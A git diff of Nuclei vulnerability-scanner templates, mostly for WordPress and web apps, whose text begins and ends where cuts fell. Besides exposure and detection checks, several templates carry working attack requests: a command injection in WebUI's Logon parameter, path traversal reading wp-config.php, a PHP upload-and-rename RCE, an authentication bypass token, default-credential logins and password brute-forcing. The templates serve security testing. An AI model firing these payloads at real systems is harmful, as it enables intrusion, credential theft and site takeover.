GET path: - - "{{BaseURL}}/.web.config.swo" - - "{{BaseURL}}/.web.config.swp" - - "{{BaseURL}}/.web.config.swp" - - "{{BaseURL}}/backup.web.config" - - "{{BaseURL}}/web.config" - - "{{BaseURL}}/web.config - Copy" - - "{{BaseURL}}/web.config copy" - - "{{BaseURL}}/web.config_backup" - - "{{BaseURL}}/web.config_good" - - "{{BaseURL}}/web.config-backup" - - "{{BaseURL}}/web.config-backup.old" - - "{{BaseURL}}/web.config-backup.txt" - - "{{BaseURL}}/web.config-backup1.txt" - - "{{BaseURL}}/web.config-good" - - "{{BaseURL}}/web.config-sample.new" - - "{{BaseURL}}/web.config-sample.bak" - - "{{BaseURL}}/web.config-sample~" - - "{{BaseURL}}/web.config.backup" - - "{{BaseURL}}/web.config.bak" - - "{{BaseURL}}/web.config.bkp" - - "{{BaseURL}}/web.config.cfg" - - "{{BaseURL}}/web.config.conf" - - "{{BaseURL}}/web.config.data" - - "{{BaseURL}}/web.config.dump" - - "{{BaseURL}}/web.config.htm" - - "{{BaseURL}}/web.config.html" - - "{{BaseURL}}/web.config.local" - - "{{BaseURL}}/web.config.old" - - "{{BaseURL}}/web.config.old.old" - - "{{BaseURL}}/web.config.ORG" - - "{{BaseURL}}/web.config.orig" - - "{{BaseURL}}/web.config.original" - - "{{BaseURL}}/web.config" - - "{{BaseURL}}/web.config_" - - "{{BaseURL}}/web.config__" - - "{{BaseURL}}/web.config______" - - "{{BaseURL}}/web.config__olds" - - "{{BaseURL}}/web.config_1" - - "{{BaseURL}}/web.config_backup" - - "{{BaseURL}}/web.config_bak" - - "{{BaseURL}}/web.config_bk" - - "{{BaseURL}}/web.config_new" - - "{{BaseURL}}/web.config_old" - - "{{BaseURL}}/web.config_old2017" - - "{{BaseURL}}/web.config_old2018" - - "{{BaseURL}}/web.config_old2019" - - "{{BaseURL}}/web.config_old2020" - - "{{BaseURL}}/web.config_orig" - - "{{BaseURL}}/web.config_original" - - "{{BaseURL}}/web.config-" - - "{{BaseURL}}/web.config-backup" - - "{{BaseURL}}/web.config-bak" - - "{{BaseURL}}/web.config-n" - - "{{BaseURL}}/web.config-o" - - "{{BaseURL}}/web.config-old" - - "{{BaseURL}}/web.config-original" - - "{{BaseURL}}/web.config-save" - - "{{BaseURL}}/web.config-work" - - "{{BaseURL}}/web.config.0" - - "{{BaseURL}}/web.config.1" - - "{{BaseURL}}/web.config.2" - - "{{BaseURL}}/web.config.3" - - "{{BaseURL}}/web.config.4" - - "{{BaseURL}}/web.config.5" - - "{{BaseURL}}/web.config.6" - - "{{BaseURL}}/web.config.7" - - "{{BaseURL}}/web.config.9" - - "{{BaseURL}}/web.config.a" - - "{{BaseURL}}/web.config.aws" - - "{{BaseURL}}/web.config.azure" - - "{{BaseURL}}/web.config.b" - - "{{BaseURL}}/web.config.backup" - - "{{BaseURL}}/web.config.backup.txt" - - "{{BaseURL}}/web.config.bak" - - "{{BaseURL}}/web.config.bk" - - "{{BaseURL}}/web.config.bkp" - - "{{BaseURL}}/web.config.c" - - "{{BaseURL}}/web.config.com" - - "{{BaseURL}}/web.config.cust" - - "{{BaseURL}}/web.config.dev" - - "{{BaseURL}}/web.config.dump" - - "{{BaseURL}}/web.config.in" - - "{{BaseURL}}/web.config.local" - - "{{BaseURL}}/web.config.maj" - - "{{BaseURL}}/web.config.new" - - "{{BaseURL}}/web.config.old" - - "{{BaseURL}}/web.config.org" - - "{{BaseURL}}/web.config.orig" - - "{{BaseURL}}/web.config.original" - - "{{BaseURL}}/web.config.php-bak" - - "{{BaseURL}}/web.config.prod" - - "{{BaseURL}}/web.config.production" - - "{{BaseURL}}/web.config.sample" - - "{{BaseURL}}/web.config.save" - - "{{BaseURL}}/web.config.save.1" - - "{{BaseURL}}/web.config.stage" - - "{{BaseURL}}/web.config.staging" - - "{{BaseURL}}/web.config.swn" - - "{{BaseURL}}/web.config.swo" - - "{{BaseURL}}/web.config.swp" - - "{{BaseURL}}/web.config.tar" - - "{{BaseURL}}/web.config.temp" - - "{{BaseURL}}/web.config.tmp" - - "{{BaseURL}}/web.config.txt" - - "{{BaseURL}}/web.config.uk" - - "{{BaseURL}}/web.config.us" - - "{{BaseURL}}/web.config=" - - "{{BaseURL}}/web.config~" - - "{{BaseURL}}/web.config~~~" - - "{{BaseURL}}/web.config1" - - "{{BaseURL}}/web.configa" - - "{{BaseURL}}/web.configb" - - "{{BaseURL}}/web.configbak" - - "{{BaseURL}}/web.configc" - - "{{BaseURL}}/web.configd" - - "{{BaseURL}}/web.confign" - - "{{BaseURL}}/web.confignew" - - "{{BaseURL}}/web.configold" - - "{{BaseURL}}/web.configoriginal" - - "{{BaseURL}}/web.configtmp" - - "{{BaseURL}}/web.config.prod.php.txt" - - "{{BaseURL}}/web.config.save" - - "{{BaseURL}}/web.config.tar" - - "{{BaseURL}}/web.config.temp" - - "{{BaseURL}}/web.config.txt" - - "{{BaseURL}}/web.config.zip" - - "{{BaseURL}}/web.config~" - - "{{BaseURL}}/web.configbak" - - "{{BaseURL}}/.web.config.bck" - - "{{BaseURL}}/web.config.back" - - "{{BaseURL}}/web.config.copy" - - "{{BaseURL}}/web.config.dat" - - "{{BaseURL}}/web.config.db" - - "{{BaseURL}}/web.config._inc" - - "{{BaseURL}}/web.config.back" - - "{{BaseURL}}/web.config.bck" - - "{{BaseURL}}/web.config.copy" - - "{{BaseURL}}/web.config.dat" - - "{{BaseURL}}/web.config.db" - - "{{BaseURL}}/web.config.tar.gz" - - "{{BaseURL}}/web.config.test" - - "{{BaseURL}}/web.config.zip" - - "{{BaseURL}}/web.config.tar.gz" - - "{{BaseURL}}/web.config.test" - - "{{BaseURL}}/web.config.tmp" - - "{{BaseURL}}/web.config_inc" + - '{{BaseURL}}/web.config' matchers-condition: and matchers: @@ -165,4 +21,4 @@ requests: - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/web/webflow-takeover.yaml b/poc/web/webflow-takeover.yaml index 3fd3180be6..da17c4a95f 100644 --- a/poc/web/webflow-takeover.yaml +++ b/poc/web/webflow-takeover.yaml @@ -1,15 +1,18 @@ id: webflow-takeover + info: name: webflow takeover detection - author: pdcommunity + author: pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + matchers: - type: word words: - -

The page you are looking for doesn't exist or has been moved.

+ -

The page you are looking for doesn't exist or has been moved.

\ No newline at end of file diff --git a/poc/web/weblogic-detect-11144.yaml b/poc/web/weblogic-detect-11144.yaml index 23f46a01a8..d50d670388 100644 --- a/poc/web/weblogic-detect-11144.yaml +++ b/poc/web/weblogic-detect-11144.yaml @@ -1,22 +1,13 @@ id: weblogic-detect info: name: Detect Weblogic - author: pdteam + author: bing0o severity: info - tags: tech,weblogic - metadata: - shodan-query: product:"Oracle Weblogic" requests: - method: GET path: - - "{{BaseURL}}/{{randstr}}" - matchers-condition: and + - "{{BaseURL}}/console/login/LoginForm.jsp" matchers: - type: word words: - - "From RFC 2068" - - "Error 404--Not Found" - condition: and - - type: status - status: - - 404 + - "WebLogic" diff --git a/poc/web/webmodule-ee.yaml b/poc/web/webmodule-ee.yaml index b4aa17abf0..ab6ad7a796 100644 --- a/poc/web/webmodule-ee.yaml +++ b/poc/web/webmodule-ee.yaml @@ -1,17 +1,14 @@ id: webmodule-ee-detection - info: name: Webmodule Detection author: pussycat0x severity: info reference: https://www.exploit-db.com/ghdb/7001 tags: webmodule-ee,tech - requests: - method: GET path: - "{{BaseURL}}/webmodule-ee/login.seam" - matchers-condition: and matchers: - type: word diff --git a/poc/web/webui-rce.yaml b/poc/web/webui-rce.yaml index 09b1d2e004..372b5a39ce 100644 --- a/poc/web/webui-rce.yaml +++ b/poc/web/webui-rce.yaml @@ -1,21 +1,32 @@ id: webui-rce + info: - name: WebUI 1.5b6 RCE + name: WebUI 1.5b6 - Remote Code Execution author: pikpikcu severity: critical - description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter. - reference: https://www.exploit-db.com/exploits/36821 + description: WebUI 1.5b6 is vulnerable to remote code execution because the 'mainfile.php' endpoint allows remote attackersto execute arbitrary code via the 'Logon' parameter. + reference: + - https://www.exploit-db.com/exploits/36821 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 tags: webui,rce + requests: - method: GET path: - '{{BaseURL}}/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27' + matchers-condition: and matchers: - type: word words: - "c5b3d7397a90f42d222f7ed9408c0dc6" part: body + - type: status status: - 200 + +# Enhanced by mp on 2022/06/03 diff --git a/poc/web/xp-webcam-11699.yaml b/poc/web/xp-webcam-11699.yaml index 421bc7db2d..f9942032ad 100644 --- a/poc/web/xp-webcam-11699.yaml +++ b/poc/web/xp-webcam-11699.yaml @@ -1,22 +1,26 @@ id: xp-webcam + info: name: XP Webcam Viewer Page author: aashiq severity: medium - description: Searches for exposed webcams by querying the /mobile.html endpoint and the existence of webcamXP in the body. + description: Searches for exposed webcams by querying the /mobile.html endpoint and existance of webcamXP in the body tags: webcam,iot + requests: - method: GET path: - "{{BaseURL}}/mobile.html" + matchers-condition: and matchers: - type: word words: - "webcams and ip cameras server for windows" part: body + - type: word words: - "Please provide a valid username/password to access this server." part: body - negative: true + negative: true \ No newline at end of file diff --git a/poc/web/zimbra-web-client-11812.yaml b/poc/web/zimbra-web-client-11812.yaml index 03481f8e9f..0f5d9c4bf5 100644 --- a/poc/web/zimbra-web-client-11812.yaml +++ b/poc/web/zimbra-web-client-11812.yaml @@ -1,26 +1,23 @@ id: zimbra-web-client - info: name: Zimbra Web Client - Sign In author: dhiyaneshDk severity: info - reference: https://www.exploit-db.com/ghdb/7409 + reference: + - https://www.exploit-db.com/ghdb/7409 metadata: - shodan-query: 'http.title:"Zimbra Web Client Sign In"' + shodan-query: http.title:"Zimbra Web Client Sign In" tags: panel,zimbra - requests: - method: GET path: - "{{BaseURL}}/zimbraAdmin/" - matchers-condition: and matchers: - type: word part: body words: - "Zimbra Administration" - - type: status status: - 200 diff --git a/poc/web/zoho-webhook-token-11835.yaml b/poc/web/zoho-webhook-token-11835.yaml old mode 100644 new mode 100755 index f3aa557a4a..3fccd958a2 --- a/poc/web/zoho-webhook-token-11835.yaml +++ b/poc/web/zoho-webhook-token-11835.yaml @@ -1,9 +1,11 @@ id: zoho-webhook-token + info: name: Zoho Webhook Disclosure author: Ice3man severity: info tags: exposure,token,zoho + requests: - method: GET path: diff --git a/poc/wordpress/alfacgiapi-wordpress-257.yaml b/poc/wordpress/alfacgiapi-wordpress-257.yaml index 271a1c4865..69b0d39f88 100644 --- a/poc/wordpress/alfacgiapi-wordpress-257.yaml +++ b/poc/wordpress/alfacgiapi-wordpress-257.yaml @@ -1,32 +1,30 @@ -id: alfacgiapi-wordpress - -info: - name: alfacgiapi - author: pussycat0x - severity: low - description: Searches for sensitive directories present in the ALFA_DATA. - reference: https://www.exploit-db.com/ghdb/6999 - tags: wordpress,listing - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-includes/ALFA_DATA/" - - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - type: word - words: - - "/wp-content/plugins/" - - "/wp-includes/ALFA_DATA/" - - "/ALFA_DATA/alfacgiapi/" - - "/cgi-bin/ALFA_DATA/alfacgiapi/" - condition: or - - type: status - status: - - 200 +id: alfacgiapi-wordpress +info: + name: alfacgiapi + author: pussycat0x + severity: low + description: Searches for sensitive directories present in the ALFA_DATA. + reference: https://www.exploit-db.com/ghdb/6999 + tags: wordpress,listing +requests: + - method: GET + path: + - "{{BaseURL}}/wp-includes/ALFA_DATA/" + - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - type: word + words: + - "/wp-content/plugins/" + - "/wp-includes/ALFA_DATA/" + - "/ALFA_DATA/alfacgiapi/" + - "/cgi-bin/ALFA_DATA/alfacgiapi/" + condition: or + - type: status + status: + - 200 diff --git a/poc/wordpress/nativechurch-wp-theme-lfd-9001.yaml b/poc/wordpress/nativechurch-wp-theme-lfd-9001.yaml index d0e87d86b0..eba8ffcbf7 100644 --- a/poc/wordpress/nativechurch-wp-theme-lfd-9001.yaml +++ b/poc/wordpress/nativechurch-wp-theme-lfd-9001.yaml @@ -1,16 +1,18 @@ id: nativechurch-wp-theme-lfd + info: - name: WordPress NativeChurch Theme - Arbitrary File Retrieval + name: WordPress NativeChurch Theme Arbitrary File Download author: 0x_Akoko severity: high - description: An arbitrary file retrieval vulnerability in the download.php file in the NativeChurch Theme allows attackers to download files from the system. - reference: - - https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html + description: A LFD Bug In download.php File In NativeChurch Theme And Make Site Vulnerable. + reference: https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html tags: wordpress,wp-theme,lfi + requests: - method: GET path: - '{{BaseURL}}/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php' + matchers-condition: and matchers: - type: word diff --git a/poc/wordpress/trilithic-viewpoint-login.yaml b/poc/wordpress/trilithic-viewpoint-login.yaml index 6046927036..953095f4f0 100644 --- a/poc/wordpress/trilithic-viewpoint-login.yaml +++ b/poc/wordpress/trilithic-viewpoint-login.yaml @@ -1,21 +1,29 @@ id: trilithic-viewpoint-default info: - name: Trilithic Viewpoint Default Credentials + name: Trilithic Viewpoint Default Login author: davidmckennirey severity: high - description: | - Searches for default admin credentials for the (discontinued) Trilithic Viewpoint application. + description: Trilithic Viewpoint application default admin credentials were discovered. Note this product has been discontinued. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: default-login,trilithic,viewpoint requests: - raw: - | POST /ViewPoint/admin/Site/ViewPointLogin HTTP/1.1 Host: {{Hostname}} - Content-Length: 65 Content-Type: application/json Cookie: trilithic_win_auth=false - {u:"admin", t:"undefined", p:"trilithic", d:"", r:false, w:false} + {u:"{{username}}", t:"undefined", p:"{{password}}", d:"", r:false, w:false} + payloads: + username: + - admin + password: + - trilithic + attack: pitchfork matchers-condition: and matchers: - type: status @@ -27,3 +35,5 @@ requests: - 'redirectUrl' part: body condition: and + +# Enhanced by mp on 2022/03/13 diff --git a/poc/wordpress/viewpoint-system-status-11016.yaml b/poc/wordpress/viewpoint-system-status-11016.yaml index 7d0e87a274..30764c6e96 100644 --- a/poc/wordpress/viewpoint-system-status-11016.yaml +++ b/poc/wordpress/viewpoint-system-status-11016.yaml @@ -1,24 +1,20 @@ id: viewpoint-system-status - info: name: ViewPoint System Status author: dhiyaneshDK severity: low - metadata: - shodan-query: http.title:"ViewPoint System Status" + reference: + - https://www.shodan.io/search?query=http.title%3A%22ViewPoint+System+Status%22 tags: status,exposures,viewpoint - requests: - method: GET path: - '{{BaseURL}}' - matchers-condition: and matchers: - type: word words: - 'ViewPoint System Status' - - type: status status: - 200 diff --git a/poc/wordpress/wordpress-accessible-wpconfig-11236.yaml b/poc/wordpress/wordpress-accessible-wpconfig-11236.yaml index c6cdd244de..4419af6656 100644 --- a/poc/wordpress/wordpress-accessible-wpconfig-11236.yaml +++ b/poc/wordpress/wordpress-accessible-wpconfig-11236.yaml @@ -1,7 +1,7 @@ id: wordpress-accessible-wpconfig info: name: WordPress accessible wp-config - author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo + author: Kiblyn11 & zomsop82 & madrobot & geeknik & daffainfo severity: high tags: wordpress,backups requests: diff --git a/poc/wordpress/wordpress-db-repair-11254.yaml b/poc/wordpress/wordpress-db-repair-11254.yaml index 3b9b5fb05f..7c9d635e19 100644 --- a/poc/wordpress/wordpress-db-repair-11254.yaml +++ b/poc/wordpress/wordpress-db-repair-11254.yaml @@ -1,20 +1,24 @@ id: wordpress-db-repair + info: name: Wordpress DB Repair Exposed author: _C0wb0y_ severity: low description: Discover enabled Wordpress repair page. tags: wordpress,config,fpd + requests: - method: GET path: - "{{BaseURL}}/wp-admin/maint/repair.php" + matchers-condition: and matchers: - type: word words: - "WordPress" + - type: word words: - "define('WP_ALLOW_REPAIR', true);" - negative: true + negative: true \ No newline at end of file diff --git a/poc/wordpress/wordpress-debug-log-11258.yaml b/poc/wordpress/wordpress-debug-log-11258.yaml index dee5e0d057..25e5e05c1e 100644 --- a/poc/wordpress/wordpress-debug-log-11258.yaml +++ b/poc/wordpress/wordpress-debug-log-11258.yaml @@ -1,9 +1,11 @@ id: wp-debug-log + info: name: WordPress debug log author: geraldino2 & @dwisiswant0 severity: low tags: wordpress,log + requests: - method: GET path: @@ -22,4 +24,4 @@ requests: part: body - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/wordpress/wordpress-emails-verification-for-woocommerce.yaml b/poc/wordpress/wordpress-emails-verification-for-woocommerce.yaml index b4c420c7dc..e4393fb210 100644 --- a/poc/wordpress/wordpress-emails-verification-for-woocommerce.yaml +++ b/poc/wordpress/wordpress-emails-verification-for-woocommerce.yaml @@ -1,29 +1,46 @@ id: wp-woocommerce-email-verification + info: - name: wordpress-emails-verification-for-woocommerce - author: random-robbie + name: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass + author: random_robbie,daffianfo severity: critical - tags: wordpress,wp-plugin - - # Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass - # https://wpvulndb.com/vulnerabilities/10318 - # GDPR plugin may give a false positive so double check headers + description: | + Email Verification for WooCommerce Wordpress plugin prior to version 1.8.2 contains a loose comparison issue which could allow any user to log in as administrator. + reference: + - https://wpvulndb.com/vulnerabilities/10318 + - https://wpscan.com/vulnerability/0c93832c-83db-4053-8a11-70de966bb3a8 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cwe-id: CWE-288 + metadata: + max-request: 2 + tags: woocommerce,wp,wpscan,wordpress,wp-plugin -requests: +http: - method: GET path: + - "{{BaseURL}}/my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" - "{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" - - "{{BaseURL}}/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" + + stop-at-first-match: true matchers-condition: and matchers: + - type: regex + part: header + regex: + - "wordpress_logged_in_[a-z0-9]{32}" + - type: word + part: body words: - - "wordpress_logged_in" - part: header + - "Your account has been activated!" + - "From your account dashboard you can view your" + condition: and - type: status status: - - 401 - - 403 - negative: true \ No newline at end of file + - 200 + +# digest: 4b0a00483046022100987033fa8b4186e78f6073527adcb6730eff184c2fd886cdec3f48e798b7f2d9022100faad5d8bc5339281f3b2e3cb1b0687a22e516ae19dc3c5087a64427c7ed68066:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress-git-config-11278.yaml b/poc/wordpress/wordpress-git-config-11278.yaml index 2e71493a93..623ab5f4aa 100644 --- a/poc/wordpress/wordpress-git-config-11278.yaml +++ b/poc/wordpress/wordpress-git-config-11278.yaml @@ -5,13 +5,10 @@ info: author: nerrorsec severity: info description: Searches for the pattern /.git/config inside themes and plugins folder. - reference: - - https://hackerone.com/reports/248693 - metadata: - max-request: 2 - tags: hackerone,config,git,exposure,wordpress,wp-plugin,wp-theme + reference: https://hackerone.com/reports/248693 + tags: config,git,exposure,wordpress,wp-plugin,wp-theme -http: +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/.git/config" @@ -32,5 +29,3 @@ http: - type: status status: - 200 - -# digest: 490a0046304402200c85e6bde7f8fd5a418f6ae475ea3e43619b2c9bbdaa025a2ff0a3467f271cc802204e6427102c1fe622a829ec9df5831e46740d60b9bf8eec9d72ecd086068a28de:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress-plugins-detect.yaml b/poc/wordpress/wordpress-plugins-detect.yaml index e6fcb6dba4..fb3b30feac 100644 --- a/poc/wordpress/wordpress-plugins-detect.yaml +++ b/poc/wordpress/wordpress-plugins-detect.yaml @@ -1,47 +1,29 @@ id: wordpress-plugins-detect - info: name: WordPress Plugins Detection - author: 0xcrypto, foulenzer - severity: high + author: 0xcrypto + severity: info tags: fuzz,wordpress - requests: - raw: - | - GET /wp-content/plugins/{{plugin}}/readme.txt HTTP/1.1 + GET /wp-content/plugins/{{pluginSlug}}/readme.txt HTTP/1.1 Host: {{Hostname}} threads: 50 payloads: - plugin: - - contact-form-7 - - wordpress-seo - - elementor - - woocommerce - - all-in-one-wp-migration - - updraftplus - - all-in-one-seo-pack - - duplicator - - essential-addons-for-elementor-lite - - optinmonster - - w3-total-cache - - redux-framework - - ninja-forms - + pluginSlug: helpers/wordlists/wordpress-plugins.txt matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - "== Description ==" - extractors: - type: regex part: body group: 1 regex: - "===\\s(.*)\\s===" # extract the plugin name - - "(?m)Stable tag: ([0-9.]+)" # extract the plugin version \ No newline at end of file + - "(?m)Stable tag: ([0-9.]+)" # extract the plugin version diff --git a/poc/wordpress/wordpress-rce-simplefilelist-11302.yaml b/poc/wordpress/wordpress-rce-simplefilelist-11302.yaml index 804afc6b74..d50fb50d35 100644 --- a/poc/wordpress/wordpress-rce-simplefilelist-11302.yaml +++ b/poc/wordpress/wordpress-rce-simplefilelist-11302.yaml @@ -1,4 +1,5 @@ id: wordpress-rce-simplefilelist + info: name: WordPress SimpleFilelist Unauthenticated Arbitrary File Upload RCE author: princechaddha @@ -6,15 +7,14 @@ info: reference: https://wpscan.com/vulnerability/10192 description: | The Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file. - tags: wordpress,wp-plugin,rce + tags: wordpress,wp-plugin,rce,intrusive,upload,python + requests: - raw: - | POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1 Host: {{Hostname}} Accept: */* - Connection: close - Content-Length: 693 Content-Type: multipart/form-data; boundary=6985fa39c0698d07f6d418b37388e1b2 --6985fa39c0698d07f6d418b37388e1b2 @@ -39,22 +39,21 @@ requests: <?php echo "Nuclei - Open source project (github.com/projectdiscovery/nuclei)"; phpinfo(); ?> --6985fa39c0698d07f6d418b37388e1b2-- + - | POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.25.1 - Accept: */* - Connection: close X-Requested-With: XMLHttpRequest - Content-Length: 81 + Accept: */* Content-Type: application/x-www-form-urlencoded eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php + - | GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1 Host: {{Hostname}} Accept: */* - Connection: close + matchers-condition: and matchers: - type: word diff --git a/poc/wordpress/wordpress-registration-enabled.yaml b/poc/wordpress/wordpress-registration-enabled.yaml index 237cd57ccb..4ff7356f84 100644 --- a/poc/wordpress/wordpress-registration-enabled.yaml +++ b/poc/wordpress/wordpress-registration-enabled.yaml @@ -1,9 +1,9 @@ id: wordpress-account-registration-enabled info: - name: WordPress Account Registration Enabled - author: h0tak88r - severity: low + name: WordPress account registration enabled + author: topscoder + severity: info tags: wordpress-misc,wordpress,wp-core,core,info http: @@ -18,7 +18,7 @@ http: - 200 - type: word words: - - "username" - - "email" - condition: or + - "Register" part: body + +# Enhanced \ No newline at end of file diff --git a/poc/wordpress/wordpress-rest-dosviacp.yaml b/poc/wordpress/wordpress-rest-dosviacp.yaml index ae2b84c698..2bd0dbbdff 100644 --- a/poc/wordpress/wordpress-rest-dosviacp.yaml +++ b/poc/wordpress/wordpress-rest-dosviacp.yaml @@ -4,8 +4,11 @@ info: name: WordPress Core 4.7.0-6.3.1 - Denial of Service via Cache Poisoning author: Jupiter severity: medium - description: WordPress Core is vulnerable to Denial of Service via Cache Poisoning in versions between 4.7.0 and 6.3.1. In cases where the X-HTTP-Method-Override header was sent in a request to a REST endpoint and the endpoint returned a 4xx error, the error could be cached, resulting in a denial of service. - reference: https://www.wordfence.com/blog/2023/10/wordpress-6-3-2-security-release-what-you-need-to-know/ + description: | + WordPress Core is vulnerable to Denial of Service via Cache Poisoning in versions between 4.7.0 and 6.3.1. In cases where the X-HTTP-Method-Override header was sent in a request to a REST endpoint and the endpoint returned a 4xx error, the error could be cached, resulting in a denial of service. + reference: + - https://www.wordfence.com/blog/2023/10/wordpress-6-3-2-security-release-what-you-need-to-know/ + tags: wordpress,wp,cache-poisoning variables: string: "{{to_lower(rand_base(5))}}" @@ -52,4 +55,4 @@ http: - type: regex part: header regex: - - '\bHIT\b' \ No newline at end of file + - '\bHIT\b' diff --git a/poc/wordpress/wordpress-tmm-db-migrate-11317.yaml b/poc/wordpress/wordpress-tmm-db-migrate-11317.yaml index d33b95d124..8e6ffbf93e 100644 --- a/poc/wordpress/wordpress-tmm-db-migrate-11317.yaml +++ b/poc/wordpress/wordpress-tmm-db-migrate-11317.yaml @@ -3,7 +3,7 @@ info: name: WordPress ThemeMarkers DB Migration File author: dwisiswant0 severity: info - tags: wordpress,wp-plugin,backup + tags: wordpress,wp-plugin,backups requests: - method: GET path: diff --git a/poc/wordpress/wordpress-total-upkeep-backup-download.yaml b/poc/wordpress/wordpress-total-upkeep-backup-download.yaml index 47fe8b3995..3309a80e9e 100644 --- a/poc/wordpress/wordpress-total-upkeep-backup-download.yaml +++ b/poc/wordpress/wordpress-total-upkeep-backup-download.yaml @@ -1,27 +1,32 @@ id: wordpress-total-upkeep-backup-download + info: name: WordPress Total Upkeep Database and Files Backup Download author: princechaddha severity: high - reference: - - https://www.exploit-db.com/exploits/49252 + reference: https://www.exploit-db.com/exploits/49252 tags: wordpress,wp-plugin + requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/boldgrid-backup/cron/restore-info.json" + matchers-condition: and matchers: + - type: word words: - "application/json" part: header + - type: word words: - '"filepath"' - '/wp-content/boldgrid_backup_' condition: and part: body + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/wordpress/wordpress-user-enum.yaml b/poc/wordpress/wordpress-user-enum.yaml index e938ce3114..b113be4fbf 100644 --- a/poc/wordpress/wordpress-user-enum.yaml +++ b/poc/wordpress/wordpress-user-enum.yaml @@ -1,16 +1,13 @@ id: wordpress-user-enum - info: name: Wordpress User Enumeration author: r3dg33k severity: info tags: wordpress - requests: - method: GET path: - "{{BaseURL}}/?author=1" - matchers-condition: and matchers: - type: regex @@ -20,7 +17,6 @@ requests: - type: status status: - 301 - extractors: - type: regex part: header diff --git a/poc/wordpress/wordpress-user-enumeration.yaml b/poc/wordpress/wordpress-user-enumeration.yaml index 663fd58ce8..c06644e07a 100644 --- a/poc/wordpress/wordpress-user-enumeration.yaml +++ b/poc/wordpress/wordpress-user-enumeration.yaml @@ -1,9 +1,11 @@ id: wordpress-user-enumeration + info: name: Wordpress user enumeration author: Manas_Harsh & daffainfo severity: info tags: wordpress + requests: - method: GET path: diff --git a/poc/wordpress/wordpress-weak-credentials.yaml b/poc/wordpress/wordpress-weak-credentials.yaml index 7c0be01ac7..a4747ae6ab 100644 --- a/poc/wordpress/wordpress-weak-credentials.yaml +++ b/poc/wordpress/wordpress-weak-credentials.yaml @@ -1,5 +1,4 @@ id: wordpress-weak-credentials - info: name: WordPress - Weak Credentials author: evolutionsec @@ -11,10 +10,8 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 - cve-id: cwe-id: CWE-522 tags: wordpress,default-login,fuzz - requests: - raw: - | @@ -25,24 +22,20 @@ requests: Referer: {{BaseURL}} log={{users}}&pwd={{passwords}} - payloads: users: helpers/wordlists/wp-users.txt passwords: helpers/wordlists/wp-passwords.txt threads: 50 attack: clusterbomb - stop-at-first-match: true matchers-condition: and matchers: - - type: word part: header words: - '/wp-admin' - 'wordpress_logged_in' condition: and - - type: status status: - 302 diff --git a/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11354.yaml b/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11354.yaml index 6f3cc78548..ef0527d5a1 100644 --- a/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11354.yaml +++ b/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11354.yaml @@ -1,9 +1,10 @@ id: wordpress-wordfence-waf-bypass-xss info: + name: Wordpress Wordfence WAF - Cross-Site Scripting author: hackergautam - name: Wordfence WAF Bypass WordPress XSS - reference: https://twitter.com/naglinagli/status/1382082473744564226 severity: medium + reference: + - https://twitter.com/naglinagli/status/1382082473744564226 tags: wordpress,wordfence,xss,bypass requests: - method: GET diff --git a/poc/wordpress/wordpress-wordfence-xss-11362.yaml b/poc/wordpress/wordpress-wordfence-xss-11362.yaml index 5e9faea1da..5bae09492e 100644 --- a/poc/wordpress/wordpress-wordfence-xss-11362.yaml +++ b/poc/wordpress/wordpress-wordfence-xss-11362.yaml @@ -1,37 +1,23 